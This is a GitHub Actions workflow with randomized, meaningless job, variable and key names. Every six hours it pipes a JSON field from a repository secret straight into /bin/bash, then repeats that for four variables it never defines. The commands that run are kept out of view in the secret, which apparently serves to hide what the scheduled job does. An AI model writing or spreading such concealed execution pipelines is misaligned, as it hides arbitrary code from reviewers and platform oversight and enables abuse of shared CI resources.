name: zibenjzk

on:
  workflow_dispatch:
  schedule:
    - cron: '7 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zibenjzk
        env:
          of9015: ${{ secrets.of9015 }}
        run: |
          echo $of9015 | jq -r .stmq3387 | /bin/bash
          echo $zh56 | jq -r .qv22453 | /bin/bash
          echo $wevsy1 | jq -r .jck85 | /bin/bash
          echo $ox8 | jq -r .fdro5 | /bin/bash
          echo $ele5045 | jq -r .b4065 | /bin/bash

